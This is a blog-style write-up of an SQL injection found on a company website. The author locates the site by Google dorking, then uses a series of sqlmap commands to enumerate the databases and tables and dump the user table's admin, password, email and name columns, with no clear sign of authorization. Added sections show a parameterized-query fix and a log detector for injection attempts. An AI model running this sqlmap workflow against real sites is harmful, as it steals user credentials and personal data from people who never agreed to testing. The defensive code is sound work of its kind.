Record the SQL injection vulnerability of XX company
2022-07-29 05:42:00 【adeylinux】
In the morning, when I got up, a friend asked me to take part in a public-welfare SRC (security response center) program, so I was dragged into exploring public-welfare SRC targets. I opened Google and searched with inurl: for science and technology companies, then opened one of the websites. While browsing the site I noticed an ?id parameter and, out of occupational habit, appended a single quotation mark after it. The page changed. I guessed it was an XSS or SQL injection hole.
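Why does a single quotation mark change the page? When the parameter is concatenated straight into the SQL string, the quote ends the string literal early and the database sees a syntax error, which the application surfaces as a changed or broken page. The following is an added example, not code from the original post or from the affected site: it builds a constructed in-memory SQLite table standing in for the site's news lookup and runs the same single-quote probe against a concatenated query and a parameterized one. The table and function names are assumptions for the demo.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the site's news table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gplat_news (id INTEGER, class TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO gplat_news VALUES (?, ?, ?)",
        [(1, "1", "Company news"), (2, "2", "Industry news")],
    )
    return conn


def lookup_vulnerable(conn, cls):
    """String concatenation: the request parameter becomes part of the SQL syntax.

    A value such as 1' leaves an unterminated string literal, so the database
    raises an error instead of returning rows. That error, or the blank page
    that replaces the normal one, is exactly the 'page changed' signal the
    post describes.
    """
    sql = "SELECT title FROM gplat_news WHERE class = '" + cls + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, cls):
    """Bound parameter: the value is sent separately from the SQL text.

    Whatever the request contains is compared as data, so 1' simply matches
    nothing and the page renders normally.
    """
    sql = "SELECT title FROM gplat_news WHERE class = ?"
    return [row[0] for row in conn.execute(sql, (cls,))]


def probe(lookup, conn, value):
    """Run one lookup and report ('ok', rows) or ('error', message)."""
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    for value in ("1", "1'"):
        print("concatenated  ", repr(value), probe(lookup_vulnerable, db, value))
        print("parameterized ", repr(value), probe(lookup_parameterized, db, value))
```

The concatenated lookup returns the expected row for a normal value and an error for the quoted one; the parameterized lookup returns the row for the normal value and an empty result for the quoted one, with no error. The fix on the real site is the same idea in PHP: prepared statements (for example through PDO or mysqli) rather than building the query string from $_GET.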
Start penetration testing.
Take out sqlmap and run it once.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
The result showed the site really was vulnerable. Then I continued testing:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
Two databases came back: bdm818993245_db and information_schema.
Then another run.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
The bdm818993245_db database has 9 tables:
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
Next, query the administrator and password columns of the user table.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
The user table has 13 columns:
+-----------+---------------+
| Column    | Type          |
+-----------+---------------+
| adder     | varchar(8)    |
| admin     | int(2)        |
| email     | varchar(60)   |
| grade     | varchar(12)   |
| id        | int(6)        |
| image     | varchar(70)   |
| name      | varchar(60)   |
| pass      | varchar(60)   |
| phone     | varchar(14)   |
| qianming  | varchar(100)  |
| times     | datetime      |
| up_time   | datetime      |
| xingb     | varchar(2)    |
+-----------+---------------+
Next, query the data in the admin and pass columns of the user table:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
Next, collect the email data from the database:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump
Then collect more data:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C
Query the administrator's user name:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
The collection is almost done, so I ended the penetration test. I will go through the remaining databases, tables and columns slowly.
Summary:
For SQL injection, try to use manual injection. When a tool is run against a website, the site easily trips up.
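The flip side of that summary is that an automated tool is also very easy to spot from the server side: a scanner sends bursts of requests to the same script with SQL metacharacters in the query string, often announces itself in the User-Agent header, and triggers 5xx responses on the way. The following is an added example, not code from the original post: it parses a few constructed Apache combined-format access log lines and flags the request patterns a defender would alert on. The IP addresses, timestamps and the sqlmap-style User-Agent string are all constructed sample values.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines (not taken from the original post or any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jul/2022:05:40:01 +0800] "GET /news.php?class=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jul/2022:05:40:02 +0800] "GET /news.php?class=1%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jul/2022:05:41:10 +0800] "GET /news.php?class=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.6.7#stable (https://sqlmap.org)"
203.0.113.5 - - [29/Jul/2022:05:41:10 +0800] "GET /news.php?class=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.6.7#stable (https://sqlmap.org)"
198.51.100.9 - - [29/Jul/2022:05:41:11 +0800] "GET /news.php?class=2 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Coarse signature for SQL syntax showing up inside a query string. Tune for
# the application; a site that legitimately accepts quotes will need a narrower set.
SQLI_MARKERS = re.compile(
    r"('|information_schema|\bunion\b|--|/\*|\bsleep\s*\()", re.IGNORECASE
)


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Decode percent-encoding so %27 is examined as the quote it really is.
    entry["query"] = unquote_plus(urlsplit(entry["target"]).query)
    return entry


def classify(entry):
    """Return the list of reasons this single request looks like injection probing."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    if SQLI_MARKERS.search(entry["query"]):
        reasons.append("sql metacharacters in query")
    if entry["status"] == "500" and entry["query"]:
        reasons.append("server error on parameterized request")
    return reasons


def analyze(log_text):
    """Aggregate findings per client IP: {ip: {"hits": n, "reasons": set()}}."""
    findings = defaultdict(lambda: {"hits": 0, "reasons": set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings[entry["ip"]]["hits"] += 1
            findings[entry["ip"]]["reasons"].update(reasons)
    return dict(findings)


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["reasons"]))
```

Only the first client is flagged, on three of its four requests. The User-Agent check is the weakest of the three signals, since the header is trivially changed, so the value of this kind of rule lies in combining it with the decoded-query signature and the error-rate signal, and in the per-IP aggregation that turns one suspicious request into a visible burst.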
My WeChat official account. Please follow it.